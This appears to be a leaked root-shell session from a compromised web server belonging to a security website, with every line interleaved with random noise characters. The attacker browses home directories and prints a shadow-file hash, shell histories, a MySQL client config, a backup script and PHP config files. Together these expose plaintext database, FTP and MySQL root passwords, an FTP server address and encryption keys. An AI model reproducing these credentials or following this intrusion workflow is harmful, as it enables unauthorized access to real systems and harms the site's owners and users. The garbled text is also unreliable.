5 F% ~- ]# q7 i8 j4 Uastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
+ w `8 ^' B/ O: B" G2 n# y' C3 e2 C0 Z7 d5 P$ V3 k$ N
sh-3.2# cat /etc/motd
! h7 r( v: R% N/ `, ^$ w, m% U#####################################################1 A1 k- Z) M8 e
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #6 u4 \) X" T) r! @, x
# |__| [__ | |__| | |__| | | | [__ | |__| #* @2 d3 V5 N; o8 `
# | | ___] | | | |___ | | \/ | ___] | | | #
& }- i# Q0 V s# #/ f o A1 S5 L
#####################################################7 p, |7 W& o( Y4 V! q
# #+ n( b" a3 K( v+ ?# s
# Admin Contact - 链接标记support@secureservertech.com #
4 b0 Y& T2 c1 Q, X3 P7 {# #
4 `: ^! u Z3 t) f& x& \# O# Available ShortCuts #% e& W' @0 m/ B8 u8 n$ B6 T" p, P3 D
# #' k4 ^. v. c: T( C/ C2 u. m( T' D
# nst - list active connections #
6 v% L1 }9 a2 J5 ~# ddos - shows how many times each ip is connected #
* z' @! v7 M2 n( q/ ^! _# ltr - restart the webserver #
N8 m$ V5 I6 `. Q# phpc - edit the php config file #, b6 R) x; x3 C+ ^, Z4 @! o1 T: K, X
# htc - edit the webserver configuration file #
% p' P/ r7 ~. I' F4 R2 o# up - uptime #8 j A% C, \2 ^* c" D% R& _% s9 }
# etd - edit the motd of the day file #
6 W9 O# U4 q* H: Q8 ?; A# M# htr - start and restart apache if needed #3 v- G. o3 d4 C0 W: h+ _
# syng - shows active SYN_RECV connections # j8 F5 t2 i& n, f5 J' P
# synd - syn flood blocker - “synd -h” for usage #9 R @- G- }0 u5 e
#####################################################
0 }, ~ s& Z& f4 X# NOTES: #, J2 R( |3 F6 T
# Last Upgrade - 12-08-2008 by JF #7 v! i3 P# m+ u/ V
# My.cnf/Mysql Optimization - 1-28-09 #4 Q0 b M/ t7 [4 P: \( D
# #! f+ C4 ?1 b# a& ^
# #9 l! y* O9 H: ]. z; E: a9 C
# #
& V, w" G. a* ?. y5 u#####################################################
N/ J" O+ Z3 d
* }7 N3 d# F$ z# N3 o# G% \sh-3.2# lastlog | grep -v Never% n# R% A# j+ l" q9 ^* ?* Q I* K
Username Port From Latest
, w% y" K9 f+ D, Broot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
3 i6 ?, q- b1 A8 w3 l( l1 Padmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
$ j7 J/ c7 M, D5 }' x, Ucom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
9 D; A) q: B9 ~7 F. {) L; Tastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
7 `3 _7 S4 u$ d$ U* g# `9 |8 i/ G4 R. O6 I& p) J
sh-3.2# ls -la# s4 J' x" `# ?+ x# N/ G
total 453376( O' `- Z4 N: i6 H8 s" B
drwxr-x— 15 root root 4096 Jun 4 08:40 .% o/ J: v1 \: d0 M$ ?
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
+ i) U9 X6 j; _ x6 ?/ S/ i-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip% l4 n* B' ?- }" J7 [
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
4 {6 K! n6 p+ P: u5 I7 x-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
8 j) w6 z# s) i7 ~4 D4 C8 `, {) e-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
/ O6 S. Y; v. Z1 b3 v' ~-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
! \, }& b( o9 P-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc" d- G2 v( ^/ z+ a3 J7 V9 s! @$ Q6 c
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh1 b- j i! p7 ?, O h4 A' r
-rw-r–r– 1 root root 1327 Nov 29 2007 cert$ F+ I! h6 J: S" R6 w7 R! Z
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql$ v/ V# H) o) v# k
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan# y( {* J, b$ Y4 |: P" q6 u
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
$ ]7 |, A, e# G- S' m/ T-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql* y2 A" o$ D5 m4 Y$ D8 V
drwx—— 2 root root 4096 Oct 28 2007 .elinks
) Y0 }, Z9 v5 k. q) Idrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1" h+ p5 P0 \% w) K G2 M
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz28 q; y( p1 {' @4 Q2 t
-rw——- 1 root root 0 Apr 16 13:19 .history* k& m) ^' V& B- p8 W
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
% ^; y6 K. Z/ M m3 |4 `-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog7 ]( ^7 `+ W2 H
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
+ F, `; \6 S0 z- b9 q" P2 l-rw——- 1 root root 35 Jun 2 14:23 .lesshst
. D+ P* d; U/ Y7 I% g: Ydrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
+ A+ [7 Y5 J3 ]5 p" h' f" sdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec/ D# W4 N4 f( {- e, D/ U$ J+ V
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz7 ^3 l, Z9 |' G
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2: A' q) E O% |( x4 I
-rwx—— 1 root root 760 Sep 18 2008 lp }5 F; {2 o* ^. k; y& R& a% Z
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
/ |( b& y u9 g) m-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
# k- j* D& V& W- N( k0 K' c-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
0 U [9 K( E3 o3 D, e7 w1 ^6 kdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
) v* y% A6 @% P% ^; J# K-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
0 d U3 y; B% S6 I3 u( T) y' Jdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
& x. l7 Z4 X3 B9 J6 F-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
& _1 Z: p3 @" \9 ~# M0 U% J3 U- x% {-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh0 R9 A$ }5 I9 q% t- p9 N+ a! l- J
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
, }, |7 R- ? Y% [, k: I-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
# d$ z$ m0 S4 M" c+ [-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
- ]: U: R8 ~% y& f; I-rw——- 1 root root 41 May 20 2008 .mytop
/ T5 Y5 [6 [7 J, h" z: udrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.64 M d7 y- F5 J8 A9 }* K( u6 Y _" C
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
7 n7 c) F0 {; Z' W! S5 mdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
9 H2 {* Z8 U+ o E-rw——- 1 root root 1462 Sep 21 2007 opt.php/ i8 Y+ S% A" k/ R6 l
-rw-r–r– 1 root root 3371 Sep 22 2007 p
& H3 g+ f& ^# @. L. g; z-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2$ C% s4 b2 u8 S: k: q) s1 z
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
) B6 m0 V4 |% g5 e8 x-rw-r–r– 1 root root 716 Nov 28 2007 server.csr& r9 h% R* H9 n+ ^
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
+ _4 A/ \/ D) G1 d! Wdrwx—— 2 root root 4096 Oct 10 2008 .ssh
Q$ I- |) s- @4 g( O4 C-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat( }5 G1 b2 g8 Y; ?, f
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc: d! G" T! t1 r3 X3 _. l
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
- y4 _( r+ @1 a/ {% Z1 F4 A-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
- B- { v) K) o4 m# _drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp8 z6 c6 w: L$ @, {* p0 e- O
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh+ a5 B# y% R2 r0 G( c
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.01 M9 k( ^ _ N5 z
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
9 N2 ^! C5 k; r$ a-rw——- 1 root root 12997 May 16 2008 .viminfo; W# G. |' z1 a! g
) O' \0 n( A, a- R2 n* ?- p4 Psh-3.2# cat .bash_history
2 A- k1 q1 E: c[snip]
: Q/ W5 N% r0 ^3 O) q2 }8 N: \wget cp4sst.com/sstlinux.tar.gz
+ k- E' C8 D- \1 d. Ktar zxvf sstlinux.tar.gz: y/ |% @9 {! o1 y$ G
cd linux-2.6.27.10" a- @; R- N6 R f* f/ m
sh install.sh
, `( t& o- U9 ^3 C {make bzImage ; make modules ; make modules_install ; make install
% p' ^# T, w) C3 V: tmake clean% K( A, L" D* I1 V
service mysqld restart; V* X) T( f1 Y$ c1 N
[snip]$ J W" H8 i* A, Y
cd /usr/sbin/; z/ z# n( @; c u4 c
chmod 4777 traceroute* Y5 ~+ U8 m/ h$ z- o# s6 C E- @
chmod 4777 ping
5 t" h' o! P. l: C5 ^( Otraceroute -I 链接标记[url]www.astalavista.ch[/url], `$ S1 S1 P$ k+ A* v
[snip]) E$ c+ G0 D& e0 l% s- ~+ y- X7 X
vi /etc/csf/csf.conf
. u4 Z" P# f1 X* Xtraceroute google.ch# f5 E/ w L5 M. p, `8 X8 ~2 A
service csf restart% h8 H) q4 g3 C( o8 Q( g4 |
tracert google.ch
7 w9 v H9 o% ^service csf restart
& E1 c: z1 x/ J- V ?* otraceroute 链接标记[url]www.google.ch[/url]% j: x0 s2 R; n
tracert 链接标记[url]www.google.ch[/url]2 b: {) y* e7 f8 v3 D
traceroute 链接标记[url]www.google.ch[/url]
; c0 [: m' U+ T4 s) R# }! g Y6 _locate traceroute
& c ^) h8 y" A4 K( i6 vchown 4755 /bin/traceroute
( r" |" Q* I" K" hchown 4777 /bin/traceroute: P( f' T5 w) o+ }2 Y5 R
locate ping
0 b/ [) v- v" ~3 {- rchown 4755 /bin/ping; V* B+ \( s6 Y6 a
chown 4777 /bin/ping
) N% S* e' b2 f9 Ccd /bin/
" S ?2 W% d4 N* `: A/ Els -ali | grep ping
* h/ k+ J1 Z$ i4 x* _" Schown root ping& j/ |2 w) D9 M5 A4 t' {* Z H
chmod 4755 ping& t* x6 D( w( p& k. F5 H4 ?
ls -ali | grep traceroute
2 i2 H3 C- T+ V+ `chown root traceroute1 m2 k0 T7 O( P3 g. z8 `& E, I
chmod 4755 traceroute
# w! ^% J2 n; M* zls -ali | grep traceroute
& l* J' E) K$ A8 F4 ?traceroute -I 链接标记[url]www.google.ch[/url]
" ], Q% T: T5 y; e ^traceroute 链接标记[url]www.google.ch[/url]" f' T- t; n/ @# T1 r6 F! d3 E: S+ g# `
whois pmsantos.ch2 J/ c$ R3 H$ N+ W) R, A. \, F! i! Y: v# x
[snip]. H# r/ }' @9 n- k" Z
mysql -h com_contrexx2_live < /root/defaultp_ports.sql p. {+ e: X8 J3 {/ L
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql/ ?, {1 S4 G' ^6 h6 j' y6 x
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql# y6 n- k! t6 y" z
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
5 T0 {7 h1 C+ S' z% c9 Ptop
: U! ?0 }/ H6 ], hping ssth.ch
* S) f7 a9 I9 @* @! ^7 n& kping asdlkfaljgasd???ljg???lasj.ch
; ?8 z+ v& \0 l1 wping asdlkfaljgasdlasj.ch$ N7 n; U: b' ]3 K
ping 链接标记[url]www.ssth.ch[/url]& J" b0 m" n6 q; n+ ]: R
ping ssth.ch
: J2 l, B! G8 T$ jnslookup 链接标记[url]www.google.ch[/url]: H5 {6 ?7 o8 l' w% G
nslookup 链接标记[url]www.ssth.ch[/url]4 t# y! m2 e1 y
man nslookup. J" J. }! K# M5 O0 W
ping 链接标记[url]www.google.ch[/url]6 j4 B( M" K4 y# C, b
nslookup 链接标记[url]www.google.ch[/url]
7 {, V" w" n ?& D2 rnslookup 链接标记[url]www.google.ch[/url]5 H2 v1 k. H6 j8 t6 V1 L
nslookup salfjasdlf.ch8 w' R) G# [9 j) g4 U
[snip], J( F: N! l( d2 d+ y& ^ g! \
openssl passwd -1 sadf" N3 T% t7 ~& a$ [. Q5 U
openssl passwd -1 5cZNHstdTy* v' y& u$ o& c1 c) n( d1 i
mysql
$ X9 C c6 E4 D! k9 Mmysql
; j; {9 @* N$ U( h! g" [! \locate proftp! v" L8 N- L, B( X( H; J8 y* W
vi /etc/proftpd.passwd
: J$ R" q+ P# B6 A* R+ ]service proftpd restart$ J9 E% @4 T: O' a
locate proftpd.conf
" x# p8 S r' Z, M0 B5 Xvi /etc/proftpd.conf
0 l, \ H# @ U& qvi /etc/proftpd.passwd
, H' L7 b5 t! S9 E/ ~# ?service proftpd restart9 G4 _! k W! l8 |: R4 H
[snip]' E+ O7 T% Q4 J1 m( i
/bin/sh /home/com/backup_system/backup.sh7 V+ l: s/ u# o* h! ~9 \
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
2 \0 G; O9 p% S; Amysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql; u( P8 m! |* D# |6 b/ B5 \
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql* D6 i+ |" P( u! [5 M. c
ls -ali
& f- A8 S! X7 q0 @* |2 [mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
. v: S4 A5 E/ s* G) P' Tmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql1 k' G7 u6 V" _7 P5 Y
crontab -l: ]/ I$ y- ~* A! K
crontab -l" a1 x, s: Z" c+ e$ {$ A6 q
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
) q( o* Y L0 M5 S/ E. t/home/com/public_html/modifications/cronjobs/exploits.sh* X; d+ ^* a- f' y* M- t W6 f
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
4 z+ o. T* N6 o: wtar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz G& q" ?2 `5 G7 w& i+ y2 I
cd lsws-4.0.3* A2 k Q# c, U' ]6 h/ G- g, Q
sh install.sh1 o8 k7 h/ y- c p, l
uptime% y, M7 Y- L+ p$ D4 N
hdparm -tt /dev/sda* M: w7 `/ G# L/ L
iostat
. @% O. Y# N! w8 e2 j: J4 \% `yum install iostat
0 A. X1 q% ^( Q& R* D) X3 Q! ]iostat/ g& z; Z, g. y& y1 Y6 N) E
whereis iostat& J8 b, h$ O- T8 M8 q" w
yjm clean all
2 S; x& O r' M3 M; A. Myum clean all ; yum -y update# ]% `) T, P$ h! E" s
iostat) K" N- U/ _' c+ g; z& R& \
yum install systat8 W& B6 l5 l3 k6 q7 o
rpm -qa | grep iostat
' D2 |2 I; {3 o! Z2 D0 `9 `! }& Erpm -qa | grep sysstat
3 Z. `& r. |: |- Srpm -qa | grep systat- Q# a/ H5 M% ]
dmesg -c
/ }. D8 E" c0 ^4 ^7 x, |7 Usysctl -p
8 |* I9 k' U2 M& suname -r/ Q- V8 p5 J. G+ k0 C
cd /usr/src, s6 R$ I, u( ~6 ^" Z! D0 z# @
wget nix101.com/kernels/sstlinux.tar.gz2 R d3 k2 ~3 v! _) @ M
shutdown -r now
5 x4 c0 s% E8 |9 C7 H" F2 jnano -w /boot/grub/grub.conf
+ Q" O& a7 S. P3 }& }8 B) a' a& F+ ]
sh-3.2# cat .my.cnf
9 r) N8 G1 o4 h[client]
: o: G" m7 ^1 G, v/ huser=da_admin; B( y6 C8 Y$ X! v* c
password=X9dctmRH
& e' I; J5 }; M2 E2 X! J9 _7 |* N$ x
sh-3.2# cat /home/com/backup_system/backup.sh( _' A, M. o3 E0 i; f
#!/bin/sh: @: C6 I: S) x/ N
#####################################################################/ M% x; m, D! ]% J
# #! E1 l) [7 `5 ?
# incremental backup for astalavista.com #' S8 n9 z( g: N n4 _* E% c
# #$ o. T) s; e! \; ^ z# Z @- V
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #) E' @* k. k' R, U, q' E X3 j% f
# #
& g7 d$ r1 j1 d9 ^#####################################################################; |# q" y2 d! j L0 @4 i) I
[snip]1 {* v8 j& h5 F
PROG_DIR=”/home/com/backup_system”;
- Q, D* e; L1 u6 @2 gBACKUP_DIR=”/home/com/backups”;3 F% Q. U1 d- i! n
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
7 D1 A# o' M, i3 r& G( g0 {# ftp for synology backup server; G1 D* T4 H7 F$ u! U, v
FTP_HOST=”212.254.194.163″;
$ G7 X, N+ h# R! v* C5 RFTP_PORT=”21″;. ^. z( c" A' W' I2 }0 B# L
FTP_USER=”astalavista.com”;
3 L6 ]9 L2 j7 ?$ d- U0 a9 m6 mFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
# C, A0 o! k* C5 [0 w; \! RFTP_DIR=”/astalavista.com”;
0 s5 @1 l. I U- |2 x4 n! I# database
" o! M" r4 f2 Y; j6 @DB_HOST=”localhost”;
( Y5 c* u; t. n @& q6 UDB_USER=”contrexxuser2″;
$ S0 S9 h# y+ t0 T9 i, PDB_PASS=”0fEYNZgXz1pKe”;
9 Z* ?9 P+ h$ f2 XDB_DATABASE1=”com_contrexx2_live”;5 q' t% O' Z1 L1 c. J
DB_DATABASE2=”com_contrexx2″;
! u& u9 p' i0 a0 d |[snip]
a7 Y! U. W# P# X# Wftp -in $FTP_HOST $FTP_PORT <<EOF
g. @4 D+ n3 s! l; A7 o0 tquote USER $FTP_USER
) j( c4 _0 {1 U6 `! x- lquote PASS $FTP_PASS
5 ?% z* Y/ y) }5 Pcd $FTP_DIR/ o; @4 a0 n$ [0 L: w
put $DB_FULLNAME-SQL_Dump.tar" d5 c7 N8 t- e2 j, e S; p
put $BACKUP_FULLNAME-Public_HTML.tar
0 p( ~% P7 p7 M$ R K+ h+ t( d& Aclose
8 l2 Y0 w% e4 K& Fbye
# W; O) i! D* j2 TEOF- a6 e9 F/ Y/ J' Q( a: p
8 k& F$ q' x4 V3 Z
sh-3.2# cd /home+ J6 Z, `9 D& n6 k5 v
sh-3.2# ls -la
9 y" |# E2 B+ N! ]total 120
, C% z3 [4 u( I6 i: N- u% a5 |drwxr-xr-x 14 root root 4096 Mar 11 17:56 .* Z8 ~. u0 P6 A
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..# H+ x& D7 G% U- R- t1 V( f9 E3 C8 t4 O& d
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
' O' b! l; r( d3 l' K9 V-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
7 b0 n' {; v8 w5 K6 g6 c5 J9 g/ y-rw——- 1 root root 8192 Jun 3 02:45 aquota.user* |+ P5 p) {2 }! y: q8 w+ e& k
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet) U6 \7 H! @- S
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
1 c5 [1 G7 Y1 e# Ydrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161' ~- G( R, B5 @. h4 G
drwx–x–x 10 com com 4096 Apr 28 12:40 com
7 }+ O% ~8 H: P udrwxr-xr-x 2 root root 4096 May 17 2007 ftp* @+ ~' s2 ?; B* [& v- y7 M5 V: A) ]
drwx—— 3 jon jon 4096 Sep 21 2007 jon. g$ ?. I" G6 ~% H2 i
drwx—— 2 root root 16384 Sep 11 2007 lost+found: w! Z6 D. {8 T$ r% o
drwxr-xr-x 2 root root 4096 Sep 14 2007 my) ]3 Q, t/ P# l/ T* M
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata# `* l3 J" d" o
drwx—— 2 jon jon 4096 Sep 15 2007 test) S( N. S9 h/ o- q! c- m9 b: k
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
6 E0 w, }$ c: e, G' u/ O
% _+ A. f% O+ e2 n: Zsh-3.2# cd admin
- h3 `0 ~: ?& {: ~) c) ]sh-3.2# ls -la/ v; l7 G7 u- x# l% Z
total 1735896
( s; N: ]8 D( X- k8 cdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
! w: s: ?" c/ Z; A4 odrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
* ] S9 b# K ~drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups1 U ~% Q+ i) d" B7 u& g
drwx—— 2 admin admin 4096 Sep 28 2007 backups
& q. r( ?: E& C& O-rw——- 1 admin admin 860 Sep 17 2008 .bash_history w% G' s% E0 `$ m E
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
( u. S5 H a' Z8 A( i+ J8 s-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile: K, A' [0 O* s$ T! F1 A6 d; C$ [
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
! U3 J" I) M# j4 C' Bdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups* e% ]6 f" D! U! L1 \
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
3 B: w! k8 `) v0 Jdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap7 o/ d% M3 T* z+ {. e% ~3 I
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
. L0 Y4 p! O8 J- ]0 B' hdrwx—— 2 admin admin 4096 Sep 21 2007 mail. J8 j: ~' P' ]! O' ~
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr$ J5 w9 B6 o: T" q e& E) C
-rw-r–r– 1 root root 887 Nov 28 2007 server.key5 C( @! s( Q5 [0 o3 U. c% u+ H+ M
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow: z8 I' C$ [8 G+ t0 B% z/ B
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
# K; a1 A# y. B. z, [, J1 _) X5 ydrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
+ I6 N5 }# U5 J7 N5 `) x
8 U' U1 n3 ?+ O. Q! q, U. I$ e `sh-3.2# ..9 M& t. N) i0 j5 M; I( [
sh-3.2# cd jon
# z6 c: [# }$ o3 a% R& ]7 l' Ksh-3.2# ls -la
8 n k4 J+ N X- Utotal 36
$ P- Y1 n% ^$ M3 H; Gdrwx—— 3 jon jon 4096 Sep 21 2007 .$ q3 M' c, ^+ o( G: i
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
9 D, h$ X( d+ r! @& t( S' C-rw——- 1 jon jon 53 Sep 21 2007 .bash_history" n+ x( C- Q0 h |8 q
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout, d- e- ~9 o, M
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
4 I4 f. S0 f! z/ s: H/ G1 ]; Z0 M-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc: j; c! F8 q1 g( A6 v o& @) X
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
; W5 a4 d* S5 b: r7 ^7 X3 t: Gdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
0 v8 h2 a+ @: o
3 a5 Y$ r3 `+ q2 ~8 Y. ~% P6 Ush-3.2# cd ../ d. F- P+ u6 E$ u5 N8 Q+ W
sh-3.2# cd test
4 d$ p$ J3 S! O7 [8 d+ tsh-3.2# ls -la& {$ U1 ?$ H5 Y3 q3 W# A6 F
total 48
# i9 |& c: e) [+ M( qdrwx—— 2 jon jon 4096 Sep 15 2007 .
$ d1 |9 Q: E* K/ B( F8 [drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..' s% z. R5 T1 s- G, T0 N% d% k: O' s" e& g+ O
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history3 A5 ?4 k4 y9 p
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout: _7 M2 {, v# D$ ]6 i/ d$ G
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
x0 h/ c: J" @: [-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc" `4 \: a: O& A% X- i$ \# _
sh-3.2# cat .bash_history7 o# d$ _* D- C2 |
/usr/bin/mysqladmin -u root password PoliuJhytg67
, q- D* D5 J# f o% I, k3 s
7 Z6 {1 F- _9 r' E/ w+ @sh-3.2# cd ..
! {/ }! O& [ S! e5 z4 l9 \sh-3.2# cd astanet
# k/ `; R+ T: T0 K. K4 w% @8 a" n: Nsh-3.2# ls -la
S1 @: I! |# Y/ x( [total 52) m* b- ?# w0 F2 U n0 b+ d; z: Z
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .& ~, U. a. i5 p5 T' |
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
0 \) p# n' m8 Fdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth+ g" ?7 v9 l$ W9 q
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
6 P8 g/ S2 t7 i0 R6 M-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
! _ v* X9 ]& L' t+ W-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
8 r: L/ n {4 h# q-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
! q2 D; P& Q" z- A2 `% ]drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains/ b8 D" s# q9 B/ S
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
2 v* E6 n, Z: Edrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
6 R; N, A. J, H3 [! M-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history3 o5 \ J; j9 O# V1 K" G
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html- y& @6 J7 N, L \4 N% _
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow* ^2 k! K) Z" m$ q' v' N1 i
' s7 E' k3 y4 y' z) z2 S
sh-3.2# cd auth/
4 @$ b- w4 H8 ksh-3.2# ls -la; B2 `& `! i m' ^
total 284 R, |+ _! f4 T! D8 S( o; h( Y3 C: O
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .# P( F' X1 O) v: b1 s, Z
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .. m1 r0 v* h: B
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
4 _4 r5 J# [) d& j6 X) x-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php& X2 t4 h3 n$ X
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd S) g; [8 j t1 j7 y( ^. m( {' S
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting0 L* Y& {# Y8 W! ]! q/ o
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd4 a- E8 R) G0 W1 K7 J7 }: W
D" m% s/ R- i7 Osh-3.2# cat hackercontest.config.inc.php5 W. y8 C5 s3 l* y# g
<?PHP
" p* m f; x3 {, ?5 }// Variabeln f?r Verbindung zur Datenbank //
0 @4 |" ^8 P' j$conxHost = ‘localhost’; // MySQL hostname
2 |& F( _( P/ g0 ~" \8 F$conxUser = ‘hackercontest’; // MySQL user! G! {; H' p9 j* p- k
$conxPassword = ‘K6m@7dUc’; // MySQL password$ h- B5 w% C6 V- W: p. k$ n6 @
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
$ D4 \" x# ^& f n) o?>6 O3 N& R* L: g5 W3 K3 \! k1 m
sh-3.2# cat hosting.config.inc.php/ k+ n3 l" X; U+ b. K3 K# E& h0 c
<?PHP
0 l' W4 q. h) Q v+ C' H$ L* ^// Variabeln f?r Verbindung zur Datenbank //! G" G' w( i& F
$conxHost = ‘localhost’; // MySQL hostname
7 r. m: K* J. Y6 f. S8 Y$conxUser = ‘hostinguser’; // MySQL user
0 v- {6 u9 u3 B2 c$ W7 o$ d3 {$conxPassword = ‘cXvB3981′; // MySQL password9 I3 I6 ? R# ?" X8 L- g
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish# M% p$ X/ `8 X; Y4 M9 l! L2 O
?>6 D* ^" n& m) v9 [5 f @
. c. T2 }6 f6 t! T7 p0 L7 B
sh-3.2# cd ..* M4 a5 H0 W# m# X) F
sh-3.2# cd com. K: Q/ z# ]* `+ k# w. g( z
sh-3.2# ls -la
